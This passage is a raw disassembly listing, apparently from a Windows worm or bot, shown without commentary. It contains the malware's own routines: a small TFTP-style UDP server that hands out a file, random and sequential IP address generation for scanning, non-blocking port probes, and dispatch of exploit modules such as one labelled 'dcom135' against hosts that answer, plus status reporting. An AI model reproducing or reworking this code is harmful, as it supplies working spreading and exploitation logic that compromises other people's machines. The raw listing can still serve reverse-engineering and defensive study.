jnz short loc_406B71
mov eax, offset byte_43C80C
loc_406B71: ; CODE XREF: sub_406AF8+72�j
push esi
mov esi, 100h
push [ebp+arg_10]
push eax
lea eax, [ebp+var_110]
push [ebp+arg_1C]
push [ebp+arg_18]
push offset aSSHttp1_1Refer ; "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
push esi
push eax
call sub_41782A
add esp, 1Ch
lea eax, [ebp+var_110]
push edi
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_110]
push eax
push ebx
call ds:dword_43F6B8 ; send
push esi
lea eax, [ebp+var_110]
push edi
push eax
call sub_417390
add esp, 0Ch
lea eax, [ebp+var_110]
push edi
push esi
push eax
push ebx
call ds:dword_43F680 ; recv
pop esi
loc_406BD5: ; CODE XREF: sub_406AF8+6B�j
push ebx
call ds:dword_43F700 ; closesocket
call ds:dword_43F5C8 ; WSACleanup
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_310]
push eax
call sub_4172AE
cmp [ebp+arg_C], edi
pop ecx
pop ecx
jnz short loc_406C15
push edi
lea eax, [ebp+var_310]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
loc_406C15: ; CODE XREF: sub_406AF8+102�j
pop edi
pop ebx
leave
retn
sub_406AF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406C19 proc near ; CODE XREF: sub_406C19:loc_407104�p
; DATA XREF: sub_407252+107�o ...
var_884 = dword ptr -884h
var_880 = dword ptr -880h
var_780 = byte ptr -780h
var_580 = byte ptr -580h
var_57F = byte ptr -57Fh
var_57E = byte ptr -57Eh
var_57D = byte ptr -57Dh
var_57C = byte ptr -57Ch
var_37C = dword ptr -37Ch
var_378 = byte ptr -378h
var_274 = byte ptr -274h
var_170 = dword ptr -170h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = byte ptr -164h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_D8 = byte ptr -0D8h
var_D7 = byte ptr -0D7h
var_D6 = byte ptr -0D6h
var_D5 = byte ptr -0D5h
var_58 = byte ptr -58h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 884h
push ebx
push esi
push edi
mov edx, [ebp+arg_0]
mov esi, offset aOctet ; "octet"
lea edi, [ebp+var_1C]
movsd
push 1
xor ebx, ebx
movsw
pop eax
mov ecx, 0A9h
mov esi, edx
lea edi, [ebp+var_37C]
push ebx
push 2
rep movsd
inc [ebp+var_16C]
push 2
mov [ebp+var_C], eax
mov [edx+2A0h], eax
call ds:dword_43F6E8 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_10], edi
jnz short loc_406CDC
push 190h
call ds:dword_424064 ; Sleep
call ds:dword_43F5FC ; WSAGetLastError
push eax
lea eax, [ebp+var_780]
push offset unk_42AC38
push eax
call sub_4172AE
add esp, 0Ch
cmp [ebp+var_E0], ebx
jnz short loc_406CBC
push ebx
lea eax, [ebp+var_780]
push [ebp+var_E4]
push eax
lea eax, [ebp+var_164]
push eax
push [ebp+var_37C]
call sub_40D679
add esp, 14h
loc_406CBC: ; CODE XREF: sub_406C19+7E�j
lea eax, [ebp+var_780]
push eax
call sub_40BF6D
push [ebp+var_170]
call sub_417076
pop ecx
pop ecx
push ebx
call ds:dword_424054 ; ExitThread
loc_406CDC: ; CODE XREF: sub_406C19+50�j
mov eax, [ebp+var_170]
push 10h
imul eax, 234h
push ebx
mov ds:dword_4450CC[eax], edi
lea eax, [ebp+var_44]
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_44], 2
push [ebp+var_168]
call ds:dword_43F668 ; htons
mov [ebp+var_42], ax
lea eax, [ebp+var_44]
push 10h
push eax
push edi
mov [ebp+var_40], ebx
call ds:dword_43F694 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_406D41
push 1388h
call ds:dword_424064 ; Sleep
dec [ebp+var_16C]
push [ebp+arg_0]
jmp loc_407104
; ---------------------------------------------------------------------------
loc_406D41: ; CODE XREF: sub_406C19+10D�j
lea eax, [ebp+var_378]
push offset aRb ; "rb"
push eax
call sub_4179A8
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_8], eax
jnz short loc_406DBF
push 190h
call ds:dword_424064 ; Sleep
lea eax, [ebp+var_378]
push eax
lea eax, [ebp+var_780]
push offset unk_42AC04
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_780]
push [ebp+var_E4]
push eax
lea eax, [ebp+var_164]
push eax
push [ebp+var_37C]
call sub_40D679
lea eax, [ebp+var_780]
push eax
call sub_40BF6D
push [ebp+var_170]
call sub_417076
add esp, 28h
push ebx
call ds:dword_424054 ; ExitThread
loc_406DBF: ; CODE XREF: sub_406C19+140�j
mov esi, 200h
loc_406DC4: ; CODE XREF: sub_406C19+4A5�j
mov eax, [ebp+arg_0]
cmp [eax+2A0h], ebx
jz loc_4070C4
mov [ebp+var_880], edi
mov edi, 80h
push edi
lea eax, [ebp+var_D8]
push ebx
push eax
mov [ebp+var_34], 5
mov [ebp+var_30], 1388h
mov [ebp+var_884], 1
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_34]
push eax
push ebx
lea eax, [ebp+var_884]
push ebx
push eax
push ebx
call ds:dword_43F650 ; select
test eax, eax
jle loc_4070B8
mov al, ds:byte_43C80C
mov ecx, edi
mov [ebp+var_580], al
xor eax, eax
lea edi, [ebp+var_57F]
mov [ebp+var_4], 10h
rep stosd
stosw
stosb
mov edi, [ebp+var_10]
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_2C]
push eax
push ebx
lea eax, [ebp+var_D8]
push 80h
push eax
push edi
call ds:dword_43F640 ; recvfrom
push [ebp+var_28]
mov [ebp+var_C], eax
call ds:dword_43F6F4 ; inet_ntoa
push eax
lea eax, [ebp+var_58]
push eax
call sub_4172AE
cmp [ebp+var_D8], bl
pop ecx
pop ecx
jnz loc_4070A2
cmp [ebp+var_D7], 1
jnz loc_406FEE
lea eax, [ebp+var_274]
push eax
call sub_417AB0
lea eax, [ebp+eax+var_D5]
mov [ebp+var_14], eax
lea eax, [ebp+var_274]
push eax
call sub_417AB0
push eax
lea eax, [ebp+var_D6]
push eax
lea eax, [ebp+var_274]
push eax
call sub_418DA0
add esp, 14h
test eax, eax
jnz loc_406FA8
lea eax, [ebp+var_1C]
push eax
call sub_417AB0
push eax
lea eax, [ebp+var_1C]
push [ebp+var_14]
push eax
call sub_418DA0
add esp, 10h
test eax, eax
jnz loc_406FA8
push ebx
push ebx
push [ebp+var_8]
call sub_418D0E
push [ebp+var_8]
lea eax, [ebp+var_57C]
mov [ebp+var_580], bl
mov [ebp+var_57F], 3
push esi
push 1
push eax
mov [ebp+var_57E], bl
mov [ebp+var_57D], 1
call sub_418A86
add esp, 1Ch
lea ecx, [ebp+var_2C]
mov [ebp+var_C], eax
add eax, 4
push [ebp+var_4]
push ecx
push ebx
push eax
lea eax, [ebp+var_580]
push eax
push edi
call ds:dword_43F6CC ; sendto
lea eax, [ebp+var_378]
push eax
lea eax, [ebp+var_58]
push eax
push offset dword_42ABBC
loc_406F5C: ; CODE XREF: sub_406C19+484�j
lea eax, [ebp+var_780]
push eax
call sub_4172AE
add esp, 10h
cmp [ebp+var_E0], ebx
jnz short loc_406F96
push ebx
lea eax, [ebp+var_780]
push [ebp+var_E4]
push eax
lea eax, [ebp+var_164]
push eax
push [ebp+var_37C]
call sub_40D679
add esp, 14h
loc_406F96: ; CODE XREF: sub_406C19+358�j
lea eax, [ebp+var_780]
push eax
call sub_40BF6D
pop ecx
jmp loc_4070B8
; ---------------------------------------------------------------------------
loc_406FA8: ; CODE XREF: sub_406C19+2B6�j
; sub_406C19+2D7�j
push [ebp+var_4]
lea eax, [ebp+var_2C]
push eax
push ebx
push 13h
push offset dword_42ABA8
push edi
call ds:dword_43F6CC ; sendto
lea eax, [ebp+var_274]
push eax
lea eax, [ebp+var_58]
push eax
lea eax, [ebp+var_D8]
push offset unk_42AB74
push eax
call sub_4172AE
lea eax, [ebp+var_D8]
push eax
call sub_40BF6D
add esp, 14h
jmp loc_4070B8
; ---------------------------------------------------------------------------
loc_406FEE: ; CODE XREF: sub_406C19+275�j
cmp [ebp+var_D7], 4
jnz loc_4070A2
mov cl, [ebp+var_D5]
mov al, [ebp+var_D6]
cmp cl, 0FFh
mov [ebp+var_580], bl
mov [ebp+var_57F], 3
jnz short loc_40702B
inc al
xor cl, cl
mov [ebp+var_57E], al
mov [ebp+var_57D], bl
jmp short loc_407039
; ---------------------------------------------------------------------------
loc_40702B: ; CODE XREF: sub_406C19+3FE�j
inc cl
mov [ebp+var_57E], al
mov [ebp+var_57D], cl
loc_407039: ; CODE XREF: sub_406C19+410�j
movzx eax, al
movzx ecx, cl
shl eax, 8
add eax, ecx
push ebx
shl eax, 9
sub eax, esi
push eax
push [ebp+var_8]
call sub_418D0E
push [ebp+var_8]
lea eax, [ebp+var_57C]
push esi
push 1
push eax
call sub_418A86
add esp, 1Ch
mov edi, eax
lea eax, [ebp+var_2C]
mov [ebp+var_C], edi
push [ebp+var_4]
push eax
lea eax, [edi+4]
push ebx
push eax
loc_407079: ; DATA XREF: _2:004282F8�o _2:0042830C�o ...
lea eax, [ebp+var_580]
push eax
push [ebp+var_10]
call ds:dword_43F6CC ; sendto
cmp edi, ebx
jnz short loc_4070B8
lea eax, [ebp+var_378]
push eax
lea eax, [ebp+var_58]
push eax
push offset dword_42AB20
jmp loc_406F5C
; ---------------------------------------------------------------------------
loc_4070A2: ; CODE XREF: sub_406C19+268�j
; sub_406C19+3DC�j
push [ebp+var_4]
lea eax, [ebp+var_2C]
push eax
push ebx
push 9
push offset dword_42AB14
push edi
call ds:dword_43F6CC ; sendto
loc_4070B8: ; CODE XREF: sub_406C19+204�j
; sub_406C19+38A�j ...
cmp [ebp+var_C], ebx
mov edi, [ebp+var_10]
jg loc_406DC4
loc_4070C4: ; CODE XREF: sub_406C19+1B4�j
push edi
call ds:dword_43F700 ; closesocket
push [ebp+var_8]
call sub_417900
mov esi, [ebp+arg_0]
dec [ebp+var_16C]
pop ecx
cmp [esi+2A0h], ebx
jnz short loc_4070F8
push [ebp+var_170]
call sub_417076
pop ecx
push ebx
call ds:dword_424054 ; ExitThread
loc_4070F8: ; CODE XREF: sub_406C19+4CA�j
push 3E8h
call ds:dword_424064 ; Sleep
push esi
loc_407104: ; CODE XREF: sub_406C19+123�j
call sub_406C19
pop edi
pop esi
pop ebx
leave
retn 4
sub_406C19 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407110 proc near ; CODE XREF: sub_40EE72+5D3D�p
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push edi
lea eax, [ebp+var_200]
push offset unk_42B134
push eax
xor ebx, ebx
call sub_4172AE
cmp ds:dword_42ACB0, ebx
pop ecx
pop ecx
mov edi, 200h
jz short loc_40717E
push esi
mov esi, offset dword_42ACB8
loc_407143: ; CODE XREF: sub_407110+6B�j
mov eax, [esi]
add ebx, eax
push eax
lea eax, [esi-26h]
push eax
lea eax, [ebp+var_400]
push offset aSD ; " %s: %d,"
push eax
call sub_4172AE
lea eax, [ebp+var_400]
push edi
push eax
lea eax, [ebp+var_200]
push eax
call sub_418DE0
add esi, 3Ch
add esp, 1Ch
cmp dword ptr [esi-8], 0
jnz short loc_407143
pop esi
loc_40717E: ; CODE XREF: sub_407110+2B�j
push ds:dword_489C50
call sub_40B721
pop ecx
push eax
push ebx
lea eax, [ebp+var_400]
push offset aTotalDInS_ ; " Total: %d in %s."
push eax
call sub_4172AE
lea eax, [ebp+var_400]
push edi
push eax
lea eax, [ebp+var_200]
push eax
call sub_418DE0
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
lea eax, [ebp+var_200]
push eax
call sub_40BF6D
add esp, 34h
pop edi
pop ebx
leave
retn
sub_407110 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4071DB proc near ; CODE XREF: sub_40EE72+56B1�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push 8
call sub_416FA2
test eax, eax
pop ecx
jle short loc_407217
mov eax, [ebp+arg_C]
push ds:dword_43C848[eax*8]
call ds:dword_43F6F4 ; inet_ntoa
push eax
lea eax, [ebp+var_200]
push offset unk_42B198
push eax
call sub_4172AE
add esp, 0Ch
jmp short loc_40722A
; ---------------------------------------------------------------------------
loc_407217: ; CODE XREF: sub_4071DB+13�j
lea eax, [ebp+var_200]
push offset unk_42B168
push eax
call sub_4172AE
pop ecx
pop ecx
loc_40722A: ; CODE XREF: sub_4071DB+3A�j
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
lea eax, [ebp+var_200]
push eax
call sub_40BF6D
add esp, 18h
leave
retn
sub_4071DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407252 proc near ; CODE XREF: sub_40797F+4F�p
var_210 = dword ptr -210h
var_204 = byte ptr -204h
var_4 = byte ptr -4
arg_10 = byte ptr 18h
arg_90 = byte ptr 98h
arg_110 = dword ptr 118h
arg_130 = dword ptr 138h
arg_138 = dword ptr 140h
arg_13C = dword ptr 144h
push ebp
mov ebp, esp
sub esp, 204h
mov eax, [ebp+arg_130]
push ebx
cmp eax, 0FFFFFFFFh
push esi
jz loc_4075E2
imul eax, 3Ch
xor ebx, ebx
cmp ds:dword_42ACBC[eax], ebx
jz loc_4074C3
push 4
call sub_416FA2
test eax, eax
pop ecx
jnz loc_4075E2
mov eax, ds:dword_42F5AC
push edi
mov edi, offset dword_43D804
push 104h
push edi
push ebx
mov ds:dword_43DA14, eax
mov ds:dword_43DA10, ebx
call ds:off_424094
push 103h
mov esi, offset dword_43D908
push offset byte_42F678
push esi
call sub_418C10
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov ds:dword_43D800, eax
mov eax, [ebp+arg_138]
push 7Fh
mov ds:dword_43DA98, eax
jnz short loc_407305
lea eax, [ebp+arg_10]
push eax
push offset dword_43DA18
call sub_418C10
add esp, 0Ch
mov ds:dword_43DA9C, 1
jmp short loc_40731F
; ---------------------------------------------------------------------------
loc_407305: ; CODE XREF: sub_407252+94�j
lea eax, [ebp+arg_90]
push eax
push offset dword_43DA18
call sub_418C10
add esp, 0Ch
mov ds:dword_43DA9C, ebx
loc_40731F: ; CODE XREF: sub_407252+B1�j
push esi
push edi
push ds:dword_43DA14
lea eax, [ebp+var_204]
push offset unk_42B328
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_204]
push 4
push eax
call sub_416D5A
add esp, 20h
mov ds:dword_43DA0C, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_43D800
push offset sub_406C19
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, ds:dword_43DA0C
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_40738E
loc_40737C: ; CODE XREF: sub_407252+13A�j
cmp ds:dword_43DAA0, ebx
jnz short loc_4073A9
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_40737C
; ---------------------------------------------------------------------------
loc_40738E: ; CODE XREF: sub_407252+128�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_204]
push offset unk_42B2E8
push eax
call sub_4172AE
add esp, 0Ch
loc_4073A9: ; CODE XREF: sub_407252+130�j
lea eax, [ebp+var_204]
push eax
call sub_40BF6D
mov edi, offset dword_43DE5C
mov [esp+210h+var_210], 104h
push edi
push ebx
mov ds:dword_43E068, ebx
call ds:off_424094
push 103h
mov esi, offset dword_43DF60
push offset byte_42F678
push esi
call sub_418C10
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov ds:dword_43DE58, eax
mov eax, [ebp+arg_138]
push 7Fh
mov ds:dword_43E0F0, eax
jnz short loc_407424
lea eax, [ebp+arg_10]
push eax
push offset dword_43E070
call sub_418C10
add esp, 0Ch
mov ds:dword_43E0F4, 1
jmp short loc_40743E
; ---------------------------------------------------------------------------
loc_407424: ; CODE XREF: sub_407252+1B3�j
lea eax, [ebp+arg_90]
push eax
push offset dword_43E070
call sub_418C10
add esp, 0Ch
mov ds:dword_43E0F4, ebx
loc_40743E: ; CODE XREF: sub_407252+1D0�j
push esi
push edi
push ds:dword_43E06C
lea eax, [ebp+var_204]
push offset dword_42B298
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_204]
push 5
push eax
call sub_416D5A
add esp, 20h
mov ds:dword_43E064, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_43DE58
push offset sub_4053D5
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, ds:dword_43E064
pop edi
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_4074B2
loc_40749C: ; CODE XREF: sub_407252+25E�j
cmp ds:dword_43E0F8, ebx
jnz loc_4075D5
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_40749C
; ---------------------------------------------------------------------------
loc_4074B2: ; CODE XREF: sub_407252+248�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset dword_42B258
jmp loc_4075C6
; ---------------------------------------------------------------------------
loc_4074C3: ; CODE XREF: sub_407252+25�j
cmp ds:dword_42ACC0[eax], ebx
jz loc_4075E2
push 3
call sub_416FA2
test eax, eax
pop ecx
jnz loc_4075E2
mov esi, offset dword_43DD34
push 104h
push esi
push ebx
call ds:off_424094
push 5Ch
push esi
call sub_418F10
pop ecx
cmp eax, ebx
pop ecx
jz short loc_407501
mov [eax], bl
loc_407501: ; CODE XREF: sub_407252+2AB�j
mov eax, ds:dword_42F5B0
mov ds:dword_43DE4C, ebx
mov ds:dword_43DE38, eax
lea eax, [ebp+arg_10]
push eax
push offset dword_43DAAC
call sub_4172AE
mov eax, [ebp+arg_110]
pop ecx
pop ecx
mov ds:dword_43DAA8, eax
mov ecx, [ebp+arg_138]
push esi
push ds:dword_43DE38
mov ds:dword_43DE44, ecx
mov ecx, [ebp+arg_13C]
push eax
mov ds:dword_43DE48, ecx
call sub_40AEE0
pop ecx
push eax
lea eax, [ebp+var_204]
push offset unk_42B20C
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_204]
push 3
push eax
call sub_416D5A
add esp, 20h
mov ds:dword_43DE40, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_43DAA8
push offset sub_405AF2
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, ds:dword_43DE40
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_4075BA
loc_4075A8: ; CODE XREF: sub_407252+366�j
cmp ds:dword_43DE54, ebx
jnz short loc_4075D5
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_4075A8
; ---------------------------------------------------------------------------
loc_4075BA: ; CODE XREF: sub_407252+354�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset unk_42B1C8
loc_4075C6: ; CODE XREF: sub_407252+26C�j
lea eax, [ebp+var_204]
push eax
call sub_4172AE
add esp, 0Ch
loc_4075D5: ; CODE XREF: sub_407252+250�j
; sub_407252+35C�j
lea eax, [ebp+var_204]
push eax
call sub_40BF6D
pop ecx
loc_4075E2: ; CODE XREF: sub_407252+14�j
; sub_407252+35�j ...
pop esi
pop ebx
leave
retn
sub_407252 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4075E6 proc near ; CODE XREF: sub_407767:loc_4077D8�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
push 4
lea esi, ds:43C848h[eax*8]
lea eax, [ebp+arg_0]
push esi
push eax
call sub_417390
add esp, 0Ch
push [ebp+arg_0]
call ds:dword_43F59C ; htonl
inc eax
push eax
mov [ebp+arg_0], eax
call ds:dword_43F664 ; htonl
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push 4
push eax
push esi
call sub_417390
mov eax, [esi]
add esp, 0Ch
pop esi
pop ebp
retn
sub_4075E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40762E proc near ; CODE XREF: sub_407767+69�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
or esi, 0FFFFFFFFh
push [ebp+arg_0]
mov [ebp+var_C], esi
mov [ebp+var_8], esi
mov [ebp+var_4], esi
mov [ebp+var_10], esi
call sub_417AB0
cmp eax, 0Fh
pop ecx
jbe short loc_407656
xor eax, eax
jmp short loc_4076C7
; ---------------------------------------------------------------------------
loc_407656: ; CODE XREF: sub_40762E+22�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push [ebp+arg_0]
call sub_418A52
add esp, 18h
cmp [ebp+var_C], esi
jnz short loc_407683
call sub_41730A
mov [ebp+var_C], eax
loc_407683: ; CODE XREF: sub_40762E+4B�j
cmp [ebp+var_8], esi
jnz short loc_407690
call sub_41730A
mov [ebp+var_8], eax
loc_407690: ; CODE XREF: sub_40762E+58�j
cmp [ebp+var_4], esi
jnz short loc_40769D
call sub_41730A
mov [ebp+var_4], eax
loc_40769D: ; CODE XREF: sub_40762E+65�j
mov eax, [ebp+var_10]
cmp eax, esi
jnz short loc_4076A9
call sub_41730A
loc_4076A9: ; CODE XREF: sub_40762E+74�j
shl eax, 8
add eax, [ebp+var_4]
mov ecx, [ebp+var_C]
shl eax, 8
add eax, [ebp+var_8]
shl eax, 8
add eax, ecx
mov ecx, [ebp+arg_4]
mov ds:dword_43C848[ecx*8], eax
loc_4076C7: ; CODE XREF: sub_40762E+26�j
pop esi
leave
retn
sub_40762E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4076CA proc near ; CODE XREF: sub_407767+BB�p
; sub_40D4C5+30�p
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
push 1
pop edi
xor ebx, ebx
push ebx
push edi
push 2
mov [ebp+var_4], edi
call ds:dword_43F6E8 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4076F3
xor eax, eax
jmp short loc_407762
; ---------------------------------------------------------------------------
loc_4076F3: ; CODE XREF: sub_4076CA+23�j
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call ds:dword_43F668 ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call ds:dword_43F704 ; ioctlsocket
lea eax, [ebp+var_1C]
push 10h
push eax
push esi
call ds:dword_43F610 ; connect
mov eax, [ebp+arg_8]
mov [ebp+var_8], ebx
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_120]
push ebx
push eax
push ebx
push ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call ds:dword_43F650 ; select
push esi
mov edi, eax
call ds:dword_43F700 ; closesocket
xor eax, eax
cmp edi, ebx
setnle al
loc_407762: ; CODE XREF: sub_4076CA+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_4076CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407767 proc near ; DATA XREF: sub_40797F+13B�o
var_2A8 = dword ptr -2A8h
var_28C = byte ptr -28Ch
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_1F8 = byte ptr -1F8h
var_178 = byte ptr -178h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_150 = byte ptr -150h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+var_150]
rep movsd
mov esi, [ebp+var_2C]
mov dword ptr [eax+148h], 1
mov eax, [ebp+var_28]
mov [ebp+var_4], esi
mov [ebp+arg_0], eax
call ds:dword_424058 ; GetTickCount
push eax
call sub_417300
mov ebx, esi
pop ecx
imul ebx, 234h
loc_4077AE: ; CODE XREF: sub_407767+204�j
mov eax, ds:dword_4450C4[ebx]
cmp ds:dword_43C84C[eax*8], 0
jz loc_407970
cmp [ebp+var_10], 0
push eax
jz short loc_4077D8
lea eax, [ebp+var_150]
push eax
call sub_40762E
pop ecx
jmp short loc_4077DD
; ---------------------------------------------------------------------------
loc_4077D8: ; CODE XREF: sub_407767+60�j
call sub_4075E6
loc_4077DD: ; CODE XREF: sub_407767+6F�j
pop ecx
mov edi, eax
push [ebp+arg_0]
push ds:dword_4450C4[ebx]
push [ebp+var_3C]
push edi
call ds:dword_43F6F4 ; inet_ntoa
push eax
lea eax, [ebp+var_28C]
push offset unk_42B3BC
push eax
call sub_4172AE
add esp, 18h
lea eax, [ebp+var_28C]
push eax
lea eax, dword_444EC0[ebx]
push eax
call sub_4172AE
push [ebp+var_38]
push [ebp+var_3C]
push edi
call sub_4076CA
add esp, 14h
cmp eax, 1
jnz loc_407960
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_4078B4
push offset dword_43D7E8
call ds:dword_4240C8 ; RtlEnterCriticalSection
push [ebp+var_3C]
push edi
call ds:dword_43F6F4 ; inet_ntoa
push eax
lea eax, [ebp+var_28C]
push offset unk_42B384
push eax
call sub_4172AE
add esp, 10h
cmp [ebp+var_14], 0
jnz short loc_407896
cmp [ebp+var_C0], 0
push 1
push [ebp+var_18]
lea eax, [ebp+var_28C]
push eax
lea eax, [ebp+var_C0]
jnz short loc_40788A
lea eax, [ebp+var_140]
loc_40788A: ; CODE XREF: sub_407767+11B�j
push eax
push [ebp+var_40]
call sub_40D679
add esp, 14h
loc_407896: ; CODE XREF: sub_407767+100�j
lea eax, [ebp+var_28C]
push eax
call sub_40BF6D
mov [esp+2A8h+var_2A8], offset dword_43D7E8
call ds:dword_4240C4 ; RtlLeaveCriticalSection
jmp loc_407960
; ---------------------------------------------------------------------------
loc_4078B4: ; CODE XREF: sub_407767+D0�j
push edi
call ds:dword_43F6F4 ; inet_ntoa
push eax
lea eax, [ebp+var_208]
push eax
call sub_4172AE
mov eax, [ebp+var_20]
pop ecx
imul eax, 3Ch
pop ecx
add eax, offset aDcom135_0 ; "dcom135"
push eax
lea eax, [ebp+var_178]
push eax
call sub_4172AE
cmp [ebp+var_C0], 0
pop ecx
pop ecx
lea eax, [ebp+var_C0]
jnz short loc_4078F9
lea eax, [ebp+var_140]
loc_4078F9: ; CODE XREF: sub_407767+18A�j
push eax
lea eax, [ebp+var_1F8]
push eax
call sub_4172AE
mov eax, [ebp+var_40]
pop ecx
mov [ebp+var_20C], eax
mov eax, [ebp+var_18]
mov [ebp+var_15C], eax
mov eax, [ebp+var_14]
mov [ebp+var_158], eax
mov eax, [ebp+var_3C]
mov [ebp+var_16C], eax
mov eax, [ebp+var_20]
pop ecx
mov [ebp+var_164], eax
imul eax, 3Ch
sub esp, 0BCh
mov [ebp+var_168], esi
lea esi, [ebp+var_20C]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call ds:off_42ACB4[eax]
mov esi, [ebp+var_4]
add esp, 0BCh
loc_407960: ; CODE XREF: sub_407767+C6�j
; sub_407767+148�j
push 7D0h
call ds:dword_424064 ; Sleep
jmp loc_4077AE
; ---------------------------------------------------------------------------
loc_407970: ; CODE XREF: sub_407767+55�j
push esi
call sub_417076
pop ecx
push 0
call ds:dword_424054 ; ExitThread
sub_407767 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40797F proc near ; DATA XREF: sub_40EE72+3300�o
; sub_40EE72+5135�o
var_1DC = dword ptr -1DCh
var_1CC = byte ptr -1CCh
var_14C = byte ptr -14Ch
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
